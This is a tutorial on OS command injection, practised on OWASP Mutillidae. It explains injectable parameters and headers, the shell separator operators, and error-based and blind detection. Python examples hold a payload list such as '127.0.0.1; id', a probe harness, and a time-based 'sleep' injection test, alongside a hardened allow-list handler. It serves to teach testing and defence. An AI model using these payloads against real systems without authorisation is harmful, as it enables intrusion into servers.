OS command injection, also referred to as shell injection, is an attack in which
an attacker executes system-level commands through a vulnerable application,
either to retrieve information from the web server or to gain unauthorized
access to it.
The flaw is not specific to any one framework: application code in Java, PHP,
ASP.NET or any other language becomes vulnerable when it passes user-controlled
input to a system call that runs commands on the server.
Verify parameters to inject data:
The following parameters should be tested for command injection flaws, as the
application may be using any of them to build a command on the web server:
→ GET: input parameters are sent in the URL query string
→ POST: input parameters are sent in the HTTP body
→ HTTP headers: applications frequently use header fields to identify end users
and tailor the response to the value in the header, so header values can end up
in a server-side command as well
Some of the important header fields to check for command injection are:
→ Cookie
→ X-Forwarded-For
→ User-Agent
→ Referer
Metacharacters:
Once a vulnerability scanner (or manual testing) suggests that the target web
application is vulnerable to command injection, the attacker tries to inject
unwanted system-level commands using metacharacters. Metacharacters are the
symbolic operators the shell uses to separate one command from the next; the
attacker uses one to terminate the legitimate command and append an injected
one. In the examples that follow, the ampersand (&) is used as the separator
that divides the authentic input from the command being injected.
Throughout this exercise we will be using OWASP Mutillidae.
To locate command injection vulnerabilities we send input containing a
separator and a harmless test command into the suspect field, then observe the
response coming back from the application.
Any of the symbols that the shell interprets as a separator between two
commands can be used.
OS Command Injection Operators:
The developer may have put filters in place to block some metacharacters. A
filter would block the injected data, so every metacharacter should be tried in
turn.
Operators with description:
; → The shell runs all the commands in sequence, separated by the semicolon
& → Separates multiple commands on one command line. On Windows the second
command runs after the first; on Unix shells the first command is sent to the
background and the second starts immediately, so the injected command still runs
&& → Runs the command following && only if the preceding command succeeds
|| → Runs the command following || only if the preceding command fails (Windows
and Linux)
| → The pipe: redirects standard output of the first command to standard input
of the second command, so the second command always runs
` → Backticks (command substitution): the shell runs the command between the
backticks and substitutes its output in place. E.g., version="OS version
`uname -a`" && echo "$version". The $(...) form does the same
() → Used to nest commands (on Unix shells they run in a subshell)
# → Command-line comment in Unix shells: everything after it is ignored, which
is useful for discarding the tail of the original command
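As an added example (not code from the original page or from Mutillidae), the Python below shows the kind of code that sits behind a vulnerable page, a hardened version of it, and what each operator in the table above does when it is injected. It assumes a POSIX /bin/sh, uses echo in place of ping so it runs offline, and uses id as the probe command; the handler names, the regex allow-list and the payload list are all constructed for this illustration.

```python
import re
import subprocess

# Constructed stand-in for a "ping a host" page: "echo" replaces "ping" so the block
# runs offline, but the injection point is the same, a shell command string built
# from user input and executed with shell=True (a POSIX /bin/sh is assumed).
def ping_vulnerable(host: str) -> str:
    cmd = f"echo PING {host}"          # user input concatenated into the command
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


HOST_RE = re.compile(r"[A-Za-z0-9.-]{1,253}")   # allow-list: hostname/IPv4 characters only

def ping_hardened(host: str) -> str:
    # 1) validate the input shape against an allow-list, rejecting every metacharacter
    if not HOST_RE.fullmatch(host):
        raise ValueError(f"rejected host value: {host!r}")
    # 2) never hand the value to a shell: pass an argv list so "host" is one argument
    return subprocess.run(["echo", "PING", host],
                          capture_output=True, text=True).stdout


# One payload per operator from the table above. "id" is the probe command and its
# "uid=" output is the marker that tells us whether the injected part executed.
PAYLOADS = {
    ";":   "127.0.0.1; id",
    "&":   "127.0.0.1 & id",
    "&&":  "127.0.0.1 && id",
    "||":  "127.0.0.1 || id",      # echo succeeds, so id is never reached
    "|":   "127.0.0.1 | id",
    "`":   "127.0.0.1 `id`",
    "$()": "127.0.0.1 $(id)",
    "#":   "127.0.0.1 # id",       # the injected part is commented out
}

def probe(handler, payloads=PAYLOADS) -> dict:
    """Return {operator: True/False/'rejected'}: True when the injected "id" ran."""
    results = {}
    for op, payload in payloads.items():
        try:
            results[op] = "uid=" in handler(payload)
        except ValueError:
            results[op] = "rejected"
    return results


if __name__ == "__main__":
    for op, hit in probe(ping_vulnerable).items():
        print(f"vulnerable {op:>3}: {'executed' if hit else 'not executed'}")
    for op, hit in probe(ping_hardened).items():
        print(f"hardened   {op:>3}: {hit}")
```

Run against the vulnerable handler, every operator except || and # gets id executed; the hardened handler rejects all eight payloads at the allow-list and, because it never invokes a shell, would not interpret the metacharacters even if one slipped through. When testing a real target, keep the probe command as harmless as id or a similar read-only command.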
Types of Command Injection:
→ Error-based injection: the attacker injects a command through an input
parameter and its output (or the resulting error) is displayed on the web page,
which proves that the application is vulnerable to command injection.
→ Blind injection: the results of the injected command are not displayed to the
attacker and no error messages are returned. The attacker must use another
technique, such as a time delay or an out-of-band request, to determine whether
the command was really executed on the server.
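As an added example (not from the original page), the Python below demonstrates one common way to confirm blind command injection when no output is returned: inject a sleep after the separator and compare response times with a baseline request. The blind endpoint is a constructed stand-in that discards all command output and always answers with the same message; it assumes a POSIX /bin/sh and uses echo in place of ping so it runs offline.

```python
import subprocess
import time
from typing import Tuple

# Constructed stand-in for a blind endpoint: it runs a shell command built from the
# user's input ("echo" in place of "ping", POSIX /bin/sh assumed) but discards stdout
# and stderr and always returns the same message, so nothing the injected command
# prints ever reaches the client.
def blind_endpoint(host: str) -> str:
    subprocess.run(f"echo PING {host}", shell=True,
                   stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    return "Host checked."


def timed_request(host: str) -> Tuple[str, float]:
    """Send one request to the endpoint and measure how long it takes."""
    start = time.monotonic()
    body = blind_endpoint(host)
    return body, time.monotonic() - start


def time_based_probe(host: str, delay: int = 2, separator: str = ";") -> dict:
    """Blind detection by timing: inject "sleep <delay>" after the separator and
    compare the response time with a baseline request. If the injected command
    ran, the response is delayed by about <delay> seconds although the body is
    identical, which is the only signal available when output is suppressed."""
    base_body, base_t = timed_request(host)
    inj_body, inj_t = timed_request(f"{host}{separator} sleep {delay}")
    delta = inj_t - base_t
    return {
        "bodies_identical": base_body == inj_body,   # nothing to read in the response
        "delta_seconds": round(delta, 2),
        "likely_injectable": delta >= delay * 0.9,   # tolerate some timing jitter
    }


if __name__ == "__main__":
    print(time_based_probe("127.0.0.1"))                  # ";" executes the sleep
    print(time_based_probe("127.0.0.1", separator=" #"))  # "#" comments it out
```

Repeat the measurement with two or three different delays before concluding anything: a consistent delta that tracks the injected value is much stronger evidence than a single slow response, which network jitter alone can produce.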